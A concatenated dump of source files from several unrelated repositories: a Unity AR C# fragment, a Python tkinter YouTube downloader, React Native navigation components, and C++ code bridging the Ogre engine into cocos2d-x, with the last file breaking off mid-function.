[Header("UI Elements")]
public Slider GazeMovementSlider;
public Button CalibrateButton;
public RectTransform ScreenReticle;
private List<ARRaycastHit> arRaycastHits = new List<ARRaycastHit>();
private Stack<GameObject> worldTargets = new Stack<GameObject>();
private Image image;
private EyeTracker m_EyeTracker;
public EyeTracker eyeTracker {
get => m_EyeTracker;
set => m_EyeTracker = value;
}
[Header("AR Managers")]
[SerializeField]
private ARCameraManager m_CameraManager;
public ARCameraManager cameraManager {
get => m_CameraManager;
set => m_CameraManager = value;
}
[SerializeField]
private ARPlaneManager m_ARPlaneManager;
public ARPlaneManager arPlaneManager {
get => m_ARPlaneManager;
set => m_ARPlaneManager = value;
}
[SerializeField]
private ARRaycastManager m_ARRaycastManager;
public ARRaycastManager arRaycastManager {
get => m_ARRaycastManager;
set => m_ARRaycastManager = value;
}
[SerializeField]
ARSession m_Session;
public ARSession session {
get => m_Session;
set => m_Session = value;
}
private void OnEnable() {
if (m_CameraManager == null || m_Session == null)
return;
m_CameraManager.requestedFacingDirection = CameraFacingDirection.World;
image = ScreenReticle.GetComponent<Image>();
}
private void Update() {
if(arRaycastManager.Raycast(ScreenReticle.position, arRaycastHits, TrackableType.PlaneWithinPolygon)) {
image.color = new Color(image.color.r, image.color.g, image.color.b, 0f);
Pose hit = arRaycastHits[0].pose;
if (worldTargets.Count == 0) {
worldTargets.Push(Instantiate(WorldTargetPrefab, hit.position, Quaternion.identity));
}
else {
worldTargets.Peek().transform.position = hit.position;
}
}
image.color = new Color(image.color.r, image.color.g, image.color.b, 0.5f);
}
public void PlaceTarget() {
var target = Instantiate(WorldTargetPrefab);
worldTargets.Push(target);
}
}
| 8aa53d0e00ea45603b967691d0b8e59e17c65ae8 | [
"C#"
] | 6 | C# | atx-barnes/ixd-prototyping-tool | deffb0804b6afdf4ec187293bc8358724f4951b8 | 42da749106949444b5b6fe5cf0c9874c4b321519 |
refs/heads/main | <file_sep>def resolutionSelector(resolution, streams):
if resolution == "1080":
print(resolution + " selector")
for x in streams:
print(x)
if "video/mp4" in x:
if "res=1080p" in x:
return x
if resolution == "720":
print(resolution)
for x in streams:
print(x)
#if "video/mp4" in streams[x]:
# if "res=720p" in streams[x]:
# return streams[x]
if resolution == "480":
print(resolution)
for x in streams:
print(x)
#if "video/mp4" in streams[x]:
# if "res=480p" in streams[x]:
# return streams[x]
if resolution == "360":
print(resolution)
for x in streams:
print(x)
if "video/mp4" in streams[x]:
if "res=360" in streams[x]:
return streams[x]
<file_sep>import tkinter as tk
from tkinter import *
from pytube import YouTube
from tkinter import messagebox, filedialog, ttk
from resolutionSelector import resolutionSelector
def widgets():
# ROW 1 ####
link_label = Label(root,
text="YouTube link :",
bg="#E8D579")
link_label.grid(row=1,
column=0,
pady=5,
padx=5)
root.linkText = Entry(root,
width=55,
textvariable=video_Link)
root.linkText.grid(row=1,
column=1,
pady=5,
padx=5,
columnspan=2)
resolution_label = Label(root,
text="Resolution :",
bg="#E8D579")
resolution_label.grid(row=1,
column=3,
pady=5,
padx=5)
root.comboResolution = ttk.Combobox(root,
values=["1080",
"720",
"480",
"360"],
textvariable=resolutionBox)
root.comboResolution.grid(row=1,
column=4,
pady=5,
padx=5)
# ROW 2 ####
destination_label = Label(root,
text="Destination :",
bg="#E8D579")
destination_label.grid(row=2,
column=0,
pady=5,
padx=5)
root.destinationText = Entry(root,
width=40,
textvariable=download_Path)
root.destinationText.grid(row=2,
column=1,
pady=5,
padx=5)
browse_b = Button(root,
text="Browse",
command=browse,
width=10,
bg="#05E8E0")
browse_b.grid(row=2,
column=2,
pady=1,
padx=1)
combobox_label = Label(root,
text="Formato :",
bg="#E8D579")
combobox_label.grid(row=2,
column=3,
pady=5,
padx=5)
root.comboFormato = ttk.Combobox(root,
values=["Mp4",
"Mp3"],
textvariable=formatoBox)
root.comboFormato.grid(row=2,
column=4,
pady=5,
padx=5)
# ROW 3 ###
download_b = Button(root,
text="Download",
command=download,
width=20,
bg="#05E8E0")
download_b.grid(row=3,
column=1,
pady=3,
padx=3)
def browse():
download_directory = filedialog.askdirectory(initialdir="YOUR DIRECTORY PATH")
download_Path.set(download_directory)
def download():
youtube_link = video_Link.get()
download_folder = download_Path.get()
getvideo = YouTube(youtube_link)
# getTitle = getvideo.title
resolution = resolutionBox.get()
videostream = getvideo.streams.get_by_resolution("1080p")
print(videostream)
#downloadresolution = resolutionSelector(resolution, videostream)
#print(downloadresolution)
#downloadresolution.download(download_folder)
# fileFormato = formatoBox.get()
messagebox.showinfo("SUCCESSFULLY", " DOWNLOADED AND SAVED IN\n" + download_folder)
root = tk.Tk()
root.geometry("700x120")
root.resizable(False, False)
root.title("Downloader")
root.config(background="#000000")
video_Link = StringVar()
download_Path = StringVar()
formatoBox = StringVar()
resolutionBox = StringVar()
widgets()
root.mainloop()
| b4a448d91ee261baabd5e2fa7b4c480a833c1417 | [
"Python"
] | 2 | Python | RodrigoRRR/Downloader | a3ff6dd61d35ad47d67e092389c0f56bca86838c | fbed1c86f98d82bef7e37b9301cb328225590567 |
refs/heads/main | <repo_name>whosmudassir/doremon<file_sep>/Navigations/DrawerNavigator.js
import React from 'react'
import { View, Text } from 'react-native'
import { NavigationContainer } from '@react-navigation/native'
import Home from './components/Home'
import About from './components/About'
import { createDrawerNavigator } from '@react-navigation/drawer';
const Drawer = createDrawerNavigator();
export default function App() {
return (
<NavigationContainer>
<Drawer.Navigator initialRouteName="Home">
<Drawer.Screen name="Home" component={Home} />
<Drawer.Screen name="About" component={About} />
</Drawer.Navigator>
</NavigationContainer>
// <View><Text>Hello world</Text></View>
);
}<file_sep>/App.js
import React from 'react'
import { View, Text } from 'react-native'
import { NavigationContainer } from '@react-navigation/native'
import Home from './components/Home'
import About from './components/About'
import { createBottomTabNavigator } from '@react-navigation/bottom-tabs';
const Tab = createBottomTabNavigator();
export default function App() {
return (
<NavigationContainer>
<Tab.Navigator initialRouteName="Home">
<Tab.Screen name="Home" component={Home} />
<Tab.Screen name="About" component={About} />
</Tab.Navigator>
</NavigationContainer>
// <View><Text>Hello world</Text></View>
);
}<file_sep>/Navigations/StackNavigator.js
import React from 'react'
import { View, Text } from 'react-native'
import { NavigationContainer } from '@react-navigation/native'
import Home from './components/Home'
import About from './components/About'
import { createNativeStackNavigator } from '@react-navigation/native-stack';
const Stack=createNativeStackNavigator()
export default function App() {
return (
<NavigationContainer>
<Stack.Navigator screenOptions={{
headerStyle: {
backgroundColor: '#777'
},
headerTintColor: '#fff',
headerTitleStyle: {
fontWeight: 'bold',
},
}}>
<Stack.Screen name="Home" component={Home} options={{title:'Home Screen from options'}} />
<Stack.Screen name="About" component={About} options={({route})=>({title:route.params.name})}/>
</Stack.Navigator>
</NavigationContainer>
)
}
<file_sep>/components/Home.js
import React from 'react'
import { View, Text, StyleSheet, Button } from 'react-native'
import { globalStyles } from '../globalStyles'
export default function Home({navigation}) {
return (
<View style={globalStyles.container}>
<Text>Hello from Home</Text>
<Button title="Go to about" onPress={()=>{navigation.navigate('About', {name:'Mudassir', age:23} )}}/>
<Button title="Open drawer" onPress={() => navigation.openDrawer()} />
</View>
)
}
const styles=StyleSheet.create({
})
| 0918002a6d290fd03ca29bd2749efed83703f56c | [
"JavaScript"
] | 4 | JavaScript | whosmudassir/doremon | 7051f0b263d54aa3c4b4ea97283e39931f3b92c4 | 3288b8981afd50e1a30abd0109445d3ef8149a2d |
refs/heads/master | <repo_name>roclas/raspberry-pi-utils<file_sep>/sensing_movement.py
#!/usr/bin/env python
import time
import RPi.GPIO as io
io.setmode(io.BCM)
pir_pin = 7
io.setup(pir_pin, io.IN) # activate input
while True:
if io.input(pir_pin):
print("PIR ALARM!")
time.sleep(0.5)
<file_sep>/music/sol.py
#!/usr/bin/env python
import time
import RPi.GPIO as GPIO
tiempo=1/1536.0
def main():
GPIO.cleanup()
GPIO.setmode(GPIO.BOARD)
# Set Pin 5 on the GPIO header to act as an output
GPIO.setup(5,GPIO.OUT)
# This loop runs forever and flashes the LED
while True:
GPIO.output(5,GPIO.HIGH)
print "se enciende el led"
# Wait for 2 seconds
time.sleep(tiempo)
GPIO.output(5,GPIO.LOW)
print "se apaga el led"
time.sleep(tiempo)
try:
main()
except:
print "error happened"
<file_sep>/intermitent.py
#!/usr/bin/env python
import time
import RPi.GPIO as GPIO
tiempo=2.0
pin=11
def main():
GPIO.cleanup()
GPIO.setmode(GPIO.BOARD)
# Set Pin X on the GPIO header to act as an output
GPIO.setup(pin,GPIO.OUT)
# This loop runs forever and flashes the LED
while True:
GPIO.output(pin,GPIO.HIGH)
print "se enciende el led"
time.sleep(tiempo)
GPIO.output(pin,GPIO.LOW)
print "se apaga el led"
time.sleep(tiempo)
try:
main()
except:
print "error happened"
| aeb073bad53649cbd957ec1d0d3790e2a75f1a6d | [
"Python"
] | 3 | Python | roclas/raspberry-pi-utils | 1641477915d7f2a28eaafae96529734f3279dd34 | 1cbb622aab512e8c1b44c8caadeff1494868954d |
refs/heads/master | <repo_name>luisgabriel84/angular-todo<file_sep>/src/app/app.component.ts
import { Component } from "@angular/core";
@Component({
selector: "app-root",
templateUrl: "./app.component.html",
styleUrls: ["./app.component.css"]
})
export class AppComponent {
title = "Angular Crud";
msg = '';
hideUpdate: Boolean= true;
employees = [
{ name: "Fatz",email:'<EMAIL>' ,position: "Manager" },
{ name: "Juan ",email:'<EMAIL>', position: "Developer" },
{ name: "Pedro",email:'<EMAIL>', position: "Designer" }
];
model: any = {};
model2: any = {};
addEmployee(): void {
this.employees.push(this.model);
this.model = {};
this.msg = "Se guardo el empleado satisfactoriamente";
}
deleteEmployee(i): void {
var answer = confirm("Estas seguro de querer eliminar?");
if(answer){
this.employees.splice(i,1);
this.msg = "Empleado eliminado";
}
}
myValue;
editEmployee(i): void {
this.hideUpdate = false;
this.model2.name = this.employees[i].name;
this.model2.email = this.employees[i].email;
this.model2.position = this.employees[i].position;
this.myValue = i;
}
updateEmployee(): void {
let i = this.myValue;
for(let j =0; j< this.employees.length; j++){
if(j == i){
this.employees[j] = this.model2;
this.model2={};
this.msg = "Empleado actualizado";
this.hideUpdate= true;
}
}
}
closeAlert():void{
this.msg ="";
}
}
| f47b9ec04d48abcec8340812e2b2cba8e29530b6 | [
"TypeScript"
] | 1 | TypeScript | luisgabriel84/angular-todo | e52fa1355e77cedec39359b2c9212f09ee7c20ad | 38b9af9fcb88c867713d9bc148e64dc00616ac38 |
refs/heads/master | <file_sep>#ifndef OGRE_BRIDGE_BUFFER_MANAGER_H
#define OGRE_BRIDGE_BUFFER_MANAGER_H
#include "cocos2d.h"
#include "OgrePrerequisites.h"
#include "OgreHardwareBufferManager.h"
#include "OgreHardwareVertexBuffer.h"
#include "OgreHardwareIndexBuffer.h"
NS_CC_BEGIN
class EventListenerCustom;
NS_CC_END
namespace Ogre {
class BridgeHardwareVertexBuffer : public HardwareVertexBuffer
{
private:
mutable GLuint _vbo;
cocos2d::EventListenerCustom * _recreateVBOEventListener;
// Scratch buffer handling
bool mLockedToScratch;
size_t mScratchOffset;
size_t mScratchSize;
void* mScratchPtr;
bool mScratchUploadOnUnlock;
protected:
void* lockImpl(size_t offset, size_t length, LockOptions options);
void unlockImpl(void);
public:
BridgeHardwareVertexBuffer(HardwareBufferManagerBase* mgr, size_t vertexSize, size_t numVertices,
HardwareBuffer::Usage usage, bool useShadowBuffer);
virtual ~BridgeHardwareVertexBuffer();
void readData(size_t offset, size_t length, void* pDest);
void writeData(size_t offset, size_t length,
const void* pSource, bool discardWholeBuffer = false);
void _updateFromShadow(void);
inline GLuint getGLBufferId(void) const { return _vbo; }
};
class BridgeHardwareIndexBuffer : public HardwareIndexBuffer
{
private:
mutable GLuint _vbo;
cocos2d::EventListenerCustom * _recreateVBOEventListener;
bool mLockedToScratch;
size_t mScratchOffset;
size_t mScratchSize;
void* mScratchPtr;
bool mScratchUploadOnUnlock;
protected:
void* lockImpl(size_t offset, size_t length, LockOptions options);
void unlockImpl(void);
public:
BridgeHardwareIndexBuffer(HardwareBufferManagerBase* mgr, IndexType idxType, size_t numIndexes,
HardwareBuffer::Usage usage,
bool useShadowBuffer);
virtual ~BridgeHardwareIndexBuffer();
void readData(size_t offset, size_t length, void* pDest);
void writeData(size_t offset, size_t length,
const void* pSource, bool discardWholeBuffer = false);
void _updateFromShadow(void);
inline GLuint getGLBufferId(void) const { return _vbo; }
};
// Default threshold at which glMapBuffer becomes more efficient than glBufferSubData (32k?)
# define OGRE_GL_DEFAULT_MAP_BUFFER_THRESHOLD (1024 * 32)
/** Implementation of HardwareBufferManager for OpenGL ES. */
class _OgreExport BridgeHardwareBufferManagerBase : public HardwareBufferManagerBase
{
protected:
char* mScratchBufferPool;
OGRE_MUTEX(mScratchMutex)
size_t mMapBufferThreshold;
public:
BridgeHardwareBufferManagerBase();
virtual ~BridgeHardwareBufferManagerBase();
/// Creates a vertex buffer
HardwareVertexBufferSharedPtr createVertexBuffer(size_t vertexSize,
size_t numVerts, HardwareBuffer::Usage usage, bool useShadowBuffer = false);
/// Create a hardware vertex buffer
HardwareIndexBufferSharedPtr createIndexBuffer(
HardwareIndexBuffer::IndexType itype, size_t numIndexes,
HardwareBuffer::Usage usage, bool useShadowBuffer = false);
/// Create a render to vertex buffer
RenderToVertexBufferSharedPtr createRenderToVertexBuffer();
/** Allocator method to allow us to use a pool of memory as a scratch
area for hardware buffers. This is because glMapBuffer is incredibly
inefficient, seemingly no matter what options we give it. So for the
period of lock/unlock, we will instead allocate a section of a local
memory pool, and use glBufferSubDataARB / glGetBufferSubDataARB
instead.
*/
void* allocateScratch(uint32 size);
/// @see allocateScratch
void deallocateScratch(void* ptr);
/** Threshold after which glMapBuffer is used and not glBufferSubData
*/
size_t getGLMapBufferThreshold() const;
void setGLMapBufferThreshold( const size_t value );
};
/// GLES2HardwareBufferManagerBase as a Singleton
class _OgreExport BridgeHardwareBufferManager : public HardwareBufferManager
{
public:
BridgeHardwareBufferManager()
: HardwareBufferManager(OGRE_NEW BridgeHardwareBufferManagerBase())
{
}
~BridgeHardwareBufferManager()
{
OGRE_DELETE mImpl;
}
/** Allocator method to allow us to use a pool of memory as a scratch
area for hardware buffers. This is because glMapBuffer is incredibly
inefficient, seemingly no matter what options we give it. So for the
period of lock/unlock, we will instead allocate a section of a local
memory pool, and use glBufferSubDataARB / glGetBufferSubDataARB
instead.
*/
void* allocateScratch(uint32 size)
{
return static_cast<BridgeHardwareBufferManagerBase*>(mImpl)->allocateScratch(size);
}
/// @see allocateScratch
void deallocateScratch(void* ptr)
{
static_cast<BridgeHardwareBufferManagerBase*>(mImpl)->deallocateScratch(ptr);
}
/** Threshold after which glMapBuffer is used and not glBufferSubData
*/
size_t getGLMapBufferThreshold() const
{
return static_cast<BridgeHardwareBufferManagerBase*>(mImpl)->getGLMapBufferThreshold();
}
void setGLMapBufferThreshold( const size_t value )
{
static_cast<BridgeHardwareBufferManagerBase*>(mImpl)->setGLMapBufferThreshold(value);
}
};
}
#endif//OGREAPP_H
<file_sep>/****************************************************************************
Copyright (c) 2014 Chukong Technologies Inc.
http://www.cocos2d-x.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
****************************************************************************/
#ifndef __CCBones_Animation_H__
#define __CCBones_Animation_H__
#include <map>
#include <unordered_map>
#include "3d/CCAnimation3D.h"
#include "base/ccMacros.h"
#include "base/CCRef.h"
#include "2d/CCActionInterval.h"
NS_CC_BEGIN
class Bone3D;
class Sprite3D;
/**
* BonesAnimate3D, Animates a Sprite3D given with an Animation3D
*/
class BonesAnimate3D: public ActionInterval
{
public:
/**create BonesAnimate3D using Animation.*/
static BonesAnimate3D* create(Animation3D* animation,bool repeat = false,float transTime = 0.1f);
/**
* create BonesAnimate3D
* @param animation used to generate BonesAnimate3D
* @param formTime
* @param duration Time the BonesAnimate3D lasts
* @return BonesAnimate3D created using animate
*/
static BonesAnimate3D* create(Animation3D* animation,bool repeat,float fromTime, float duration);
/**
* create BonesAnimate3D by frame section, [startFrame, endFrame)
* @param animation used to generate BonesAnimate3D
* @param startFrame
* @param endFrame
* @param frameRate default is 30 per second
* @return BonesAnimate3D created using animate
*/
static BonesAnimate3D* createWithFrames(Animation3D* animation,bool repeat,int startFrame, int endFrame, float frameRate = 30.f);
//
// Overrides
//
virtual void stop() override;
virtual void step(float dt) override;
virtual void startWithTarget(Node *target) override;
virtual BonesAnimate3D* reverse() const override;
virtual BonesAnimate3D *clone() const override;
virtual void update(float t) override;
virtual bool isDone() const;
/**get & set speed, negative speed means playing reverse */
float getSpeed() const;
void setSpeed(float speed);
/**get & set blend weight, weight must positive*/
float getWeight() const { return _weight; }
void setWeight(float weight);
float getAnimationLength() const { return _animationLength; }
void setAnimationLength(float length) { _animationLength = length; }
bool getRepeat() const { return _repeat; }
void setRepeat(bool repeat) { _repeat = repeat; }
/** animate transistion time */
float getTransitionTime() { return _transTime; }
void setTransitionTime(float transTime) { _transTime = transTime; }
/**get & set play reverse, these are deprecated, use set negative speed instead*/
CC_DEPRECATED_ATTRIBUTE bool getPlayBack() const { return _playReverse; }
CC_DEPRECATED_ATTRIBUTE void setPlayBack(bool reverse) { _playReverse = reverse; }
CC_CONSTRUCTOR_ACCESS:
BonesAnimate3D();
virtual ~BonesAnimate3D();
void removeFromMap();
protected:
enum class BonesAnimationState
{
FadeIn,
FadeOut,
Running,
};
BonesAnimationState _state; //animation state
Animation3D* _animation; //animation data
bool _repeat;
bool _isDone;
float _transTime; //transition time from one BonesAnimate3D to another
float _absSpeed; //playing speed
float _weight; //blend weight
float _start; //start time 0 - 1, used to generate sub BonesAnimate3D
float _last; //last time 0 - 1, used to generate sub BonesAnimate3D
bool _playReverse; // is playing reverse
float _accTransTime; // acculate transition time
float _lastTime; // last t (0 - 1)
float _animationLength; // then animation length(at speed 1)
std::unordered_map<Bone3D*, Animation3D::Curve*> _boneCurves; //weak ref
//sprite animates
static std::unordered_map<Sprite3D*, BonesAnimate3D*> s_fadeInAnimates;
static std::unordered_map<Sprite3D*, BonesAnimate3D*> s_fadeOutAnimates;
static std::unordered_map<Sprite3D*, BonesAnimate3D*> s_runningAnimates;
};
NS_CC_END
#endif // __CCBonesAnimation_H__
<file_sep>#ifndef OGRE_BRIDGE_TEXTURE_MANAGER_H
#define OGRE_BRIDGE_TEXTURE_MANAGER_H
#include "cocos2d.h"
#include "OgreTexture.h"
#include "OgreTextureManager.h"
NS_CC_BEGIN
class Texture2D;
NS_CC_END
namespace Ogre {
class BridgeTexture : public Texture
{
public:
// Constructor
BridgeTexture(ResourceManager* creator, const String& name, ResourceHandle handle,
const String& group, bool isManual, ManualResourceLoader* loader);
virtual ~BridgeTexture();
void createRenderTexture();
/// @copydoc Texture::getBuffer
HardwarePixelBufferSharedPtr getBuffer(size_t face, size_t mipmap);
// Takes the OGRE texture type (1d/2d/3d/cube) and returns the appropriate GL one
GLenum getBridgeTextureTarget(void) const;
GLuint getGLID() const{ return mTextureID;}
protected:
/// @copydoc Texture::createInternalResourcesImpl
void createInternalResourcesImpl(void);
/// @copydoc Resource::prepareImpl
void prepareImpl(void);
/// @copydoc Resource::unprepareImpl
void unprepareImpl(void);
/// @copydoc Resource::loadImpl
void loadImpl(void);
/// @copydoc Resource::freeInternalResourcesImpl
void freeInternalResourcesImpl(void);
/** Internal method, create GLHardwarePixelBuffers for every face and
mipmap level. This method must be called after the GL texture object was created,
the number of mipmaps was set (GL_TEXTURE_MAX_LEVEL) and glTexImageXD was called to
actually allocate the buffer
*/
void _createSurfaceList();
/// Used to hold images between calls to prepare and load.
typedef SharedPtr<vector<Image>::type > LoadedImages;
/** Vector of images that were pulled from disk by
prepareLoad but have yet to be pushed into texture memory
by loadImpl. Images should be deleted by loadImpl and unprepareImpl.
*/
LoadedImages mLoadedImages;
private:
GLuint mTextureID;
typedef vector<cocos2d::Texture2D *>::type CocosTextureList;
CocosTextureList mCocosTextureList;
};
/** Specialisation of SharedPtr to allow SharedPtr to be assigned to GLES2TexturePtr
@note Has to be a subclass since we need operator=.
We could templatise this instead of repeating per Resource subclass,
except to do so requires a form VC6 does not support i.e.
ResourceSubclassPtr<T> : public SharedPtr<T>
*/
class BridgeTexturePtr : public SharedPtr<BridgeTexture>
{
public:
BridgeTexturePtr() : SharedPtr<BridgeTexture>() {}
explicit BridgeTexturePtr(BridgeTexture* rep) : SharedPtr<BridgeTexture>(rep) {}
BridgeTexturePtr(const BridgeTexturePtr& r) : SharedPtr<BridgeTexture>(r) {}
BridgeTexturePtr(const ResourcePtr& r) : SharedPtr<BridgeTexture>()
{
// lock & copy other mutex pointer
OGRE_MUTEX_CONDITIONAL(r.OGRE_AUTO_MUTEX_NAME)
{
OGRE_LOCK_MUTEX(*r.OGRE_AUTO_MUTEX_NAME)
OGRE_COPY_AUTO_SHARED_MUTEX(r.OGRE_AUTO_MUTEX_NAME)
pRep = static_cast<BridgeTexture*>(r.getPointer());
pUseCount = r.useCountPointer();
if (pUseCount)
{
++(*pUseCount);
}
}
}
BridgeTexturePtr(const TexturePtr& r) : SharedPtr<BridgeTexture>()
{
*this = r;
}
/// Operator used to convert a ResourcePtr to a GLESTexturePtr
BridgeTexturePtr& operator=(const ResourcePtr& r)
{
if (pRep == static_cast<BridgeTexture*>(r.getPointer()))
{
return *this;
}
release();
// lock & copy other mutex pointer
OGRE_MUTEX_CONDITIONAL(r.OGRE_AUTO_MUTEX_NAME)
{
OGRE_LOCK_MUTEX(*r.OGRE_AUTO_MUTEX_NAME)
OGRE_COPY_AUTO_SHARED_MUTEX(r.OGRE_AUTO_MUTEX_NAME)
pRep = static_cast<BridgeTexture*>(r.getPointer());
pUseCount = r.useCountPointer();
if (pUseCount)
{
++(*pUseCount);
}
}
else
{
// RHS must be a null pointer
assert(r.isNull() && "RHS must be null if it has no mutex!");
setNull();
}
return *this;
}
/// Operator used to convert a TexturePtr to a GLESTexturePtr
BridgeTexturePtr& operator=(const TexturePtr& r)
{
if (pRep == static_cast<BridgeTexture*>(r.getPointer()))
return *this;
release();
// lock & copy other mutex pointer
OGRE_MUTEX_CONDITIONAL(r.OGRE_AUTO_MUTEX_NAME)
{
OGRE_LOCK_MUTEX(*r.OGRE_AUTO_MUTEX_NAME)
OGRE_COPY_AUTO_SHARED_MUTEX(r.OGRE_AUTO_MUTEX_NAME)
pRep = static_cast<BridgeTexture*>(r.getPointer());
pUseCount = r.useCountPointer();
if (pUseCount)
{
++(*pUseCount);
}
}
else
{
// RHS must be a null pointer
assert(r.isNull() && "RHS must be null if it has no mutex!");
setNull();
}
return *this;
}
};
/** GL ES-specific implementation of a TextureManager */
class BridgeHardwareTextureManager : public TextureManager
{
public:
BridgeHardwareTextureManager();
virtual ~BridgeHardwareTextureManager();
void createWarningTexture();
GLuint getWarningTextureID() { return mWarningTextureID; }
/// @copydoc TextureManager::getNativeFormat
PixelFormat getNativeFormat(TextureType ttype, PixelFormat format, int usage);
/// @copydoc TextureManager::isHardwareFilteringSupported
bool isHardwareFilteringSupported(TextureType ttype, PixelFormat format, int usage,
bool preciseFormatOnly = false);
protected:
/// @copydoc ResourceManager::createImpl
Resource* createImpl(const String& name, ResourceHandle handle,
const String& group, bool isManual, ManualResourceLoader* loader,
const NameValuePairList* createParams);
/// Internal method to create a warning texture (bound when a texture unit is blank)
GLuint mWarningTextureID;
};
}
#endif
<file_sep>/****************************************************************************
Copyright (c) 2014 Chukong Technologies Inc.
http://www.cocos2d-x.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
****************************************************************************/
#include "CameraBillBoard.h"
#include "base/CCDirector.h"
#include "2d/CCCamera.h"
#include "renderer/CCRenderer.h"
#include "renderer/CCGLProgramCache.h"
NS_CC_BEGIN
void CameraBillBoard::visit(Renderer* renderer, const Mat4 &parentTransform, uint32_t parentFlags)
{
// quick return if not visible. children won't be drawn.
if (!_visible)
{
return;
}
uint32_t flags = processParentFlags(parentTransform, parentFlags);
// IMPORTANT:
// To ease the migration to v3.0, we still support the Mat4 stack,
// but it is deprecated and your code should not rely on it
Director* director = Director::getInstance();
director->pushMatrix(MATRIX_STACK_TYPE::MATRIX_STACK_MODELVIEW);
director->loadMatrix(MATRIX_STACK_TYPE::MATRIX_STACK_MODELVIEW, _modelViewTransform);
if (flags & FLAGS_DIRTY_MASK)
{
if(!_children.empty())
{
sortAllChildren();
cocos2d::Quaternion rotation;
for(auto it=_children.cbegin(); it != _children.cend(); ++it)
{
(*it)->setAdditionalTransform(nullptr);
Vec2 anchorPointInPoints;
anchorPointInPoints = (*it)->getAnchorPointInPoints();
Vec2 anchorPoint;
anchorPoint.x = anchorPointInPoints.x * _scaleX;
anchorPoint.y = anchorPointInPoints.y * _scaleY;
Mat4 additional = (*it)->getNodeToWorldTransform();
additional.getRotation(&rotation);
rotation.inverse();
Mat4 moveRotation = Mat4::IDENTITY;
moveRotation.translate(anchorPoint.x,anchorPoint.y,0);
Mat4 cameraRotation;
Mat4::createRotation(rotation,&cameraRotation);
moveRotation = moveRotation * cameraRotation;
moveRotation.translate(-anchorPoint.x,-anchorPoint.y,0);
(*it)->setAdditionalTransform(&moveRotation);
(*it)->visit(renderer, _modelViewTransform, flags);
}
}
}
else
{
if(!_children.empty())
{
sortAllChildren();
for(auto it=_children.cbegin(); it != _children.cend(); ++it)
(*it)->visit(renderer, _modelViewTransform, flags);
}
}
director->popMatrix(MATRIX_STACK_TYPE::MATRIX_STACK_MODELVIEW);
// FIX ME: Why need to set _orderOfArrival to 0??
// Please refer to https://github.com/cocos2d/cocos2d-x/pull/6920
// reset for next frame
// _orderOfArrival = 0;
}
NS_CC_END<file_sep>#include "ScriptCallFuncHelper.h"
NS_CC_BEGIN
ScriptCallFuncHelper *ScriptCallFuncHelper::create()
{
ScriptCallFuncHelper *ret = new (std::nothrow) ScriptCallFuncHelper();
if (ret)
{
ret->autorelease();
return ret;
}
else
{
CC_SAFE_DELETE(ret);
return nullptr;
}
}
ScriptCallFuncHelper *ScriptCallFuncHelper::create(int id)
{
ScriptCallFuncHelper *ret = ScriptCallFuncHelper::create();
if(ret)
{
ret->addScriptListener(id);
}
return ret;
}
void ScriptCallFuncHelper::excuteScript(const Value &value)
{
if(mhandlerId && mScriptManagerHandler)
{
mScriptManagerHandler(value,mhandlerId);
}
}
void ScriptCallFuncHelper::addScriptListener(int id)
{
mhandlerId = id;
}
void ScriptCallFuncHelper::removeScriptListener()
{
mhandlerId = 0;
}
void ScriptCallFuncHelper::registerScriptManager(const std::function<void(const Value &value,int id)>& func)
{
mScriptManagerHandler = func;
}
ScriptCallFuncHelper::ScriptCallFuncHelper()
:mhandlerId(0)
{
}
ScriptCallFuncHelper::~ScriptCallFuncHelper()
{
mhandlerId = 0;
}
NS_CC_END<file_sep>#include "OgreOgreManager.h"
#include <Ogre.h>
#include <OgreFontManager.h>
#include <OgreParticleFXPlugin.h>
#include <ParticleUniversePlugin.h>
#include <ParticleUniverseSystemManager.h>
#include "components/OgreBridgeImageCodec.h"
#include "components/OgreBridgeSceneManager.h"
#include "components/OgreBridgeFileSystemArchive.h"
#include "components/OgreBridgeBufferManager.h"
#include "components/OgreBridgeTextureManager.h"
#include "components/OgreBridgeRenderSystem.h"
#include "components/OgreBridgeRenderSystemPlugin.h"
#include "components/OgreBridgeWindow.h"
#include "cocos2d.h"
NS_CC_BEGIN
//-----------------------------------------------------------------------
static OgreManager *s_BridgeRootManage = NULL;
//-----------------------------------------------------------------------
OgreManager::OgreManager():
mRoot(NULL),
mCamera(NULL),
mWindow(NULL),
mSceneMgr(NULL)
{}
OgreManager::~OgreManager()
{
}
OgreManager *OgreManager::getInstance()
{
if (!s_BridgeRootManage)
{
s_BridgeRootManage = new OgreManager();
}
return s_BridgeRootManage;
}
void OgreManager::initialize()
{
if(!mRoot)
{
auto director = cocos2d::Director::getInstance();
auto origin = director->getVisibleOrigin();
auto visibleSize = director->getVisibleSize();
// 创建Root,在调用OGRE任何功能之前必须已经创建了Root
mRoot = new Ogre::Root();
